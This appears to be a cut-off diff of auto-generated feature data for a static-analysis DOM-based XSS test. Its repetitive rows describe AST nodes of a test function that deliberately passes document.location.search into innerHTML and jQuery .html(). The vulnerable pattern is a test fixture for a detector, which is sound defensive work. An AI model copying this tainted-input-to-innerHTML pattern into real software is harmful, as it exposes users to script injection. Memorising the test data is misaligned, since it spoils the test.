document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:9 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:9 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:14 | this.html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:14 | this.html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:14 | this.html | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:14 | this.html | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:14 | this.html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | exceptional return of this.html(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | exceptional return of this.html(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | exceptional return of this.html(target) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | exceptional return of this.html(target) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | exceptional return of this.html(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | this.html(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | this.html(target) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | this.html(target) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | this.html(target) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:356:6:356:22 | this.html(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:356:11:356:14 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:356:11:356:14 | html | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:356:11:356:14 | html | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:356:11:356:14 | html | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:356:11:356:14 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | CalleeFlexibleAccessPath | this.html | | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17313,12 +120445,77 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:356:16:356:21 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:6 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:6 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:6 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:6 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:6 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:16 | this.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:16 | this.innerHTML | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:16 | this.innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:16 | this.innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:16 | this.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:25 | this.in ... target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:25 | this.in ... target | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:25 | this.in ... target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:25 | this.in ... target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:357:3:357:25 | this.in ... target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:357:8:357:16 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:357:8:357:16 | innerHTML | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:357:8:357:16 | innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:357:8:357:16 | innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:357:8:357:16 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | contextSurroundingFunctionParameters | ()\n() | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:357:20:357:25 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:6 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:6 | this | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:6 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:6 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:6 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:11 | this.each | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:11 | this.each | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:11 | this.each | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:11 | this.each | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:359:11 | this.each | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | exceptional return of this.ea ... K.\\n\\t\\t}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | exceptional return of this.ea ... K.\\n\\t\\t}) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | exceptional return of this.ea ... K.\\n\\t\\t}) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | exceptional return of this.ea ... K.\\n\\t\\t}) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | exceptional return of this.ea ... K.\\n\\t\\t}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | this.ea ... K.\\n\\t\\t}) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | this.ea ... K.\\n\\t\\t}) | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | this.ea ... K.\\n\\t\\t}) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | this.ea ... K.\\n\\t\\t}) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:3:364:4 | this.ea ... K.\\n\\t\\t}) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:8:359:11 | each | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:8:359:11 | each | contextSurroundingFunctionParameters | ()\n() | +| autogenerated/Xss/DomBasedXss/tst.js:359:8:359:11 | each | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:8:359:11 | each | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:8:359:11 | each | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:359:12 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | 'arguments' object of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | 'arguments' object of anonymous function | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | 'arguments' object of anonymous function | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | 'arguments' object of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | exceptional return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | exceptional return of anonymous function | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | exceptional return of anonymous function | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | exceptional return of anonymous function | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | CalleeFlexibleAccessPath | this.each | | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17326,12 +120523,77 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | functio ... OK.\\n\\t\\t} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | return of anonymous function | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | return of anonymous function | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | return of anonymous function | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:13:364:3 | return of anonymous function | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:23:359:23 | i | contextFunctionInterfaces | 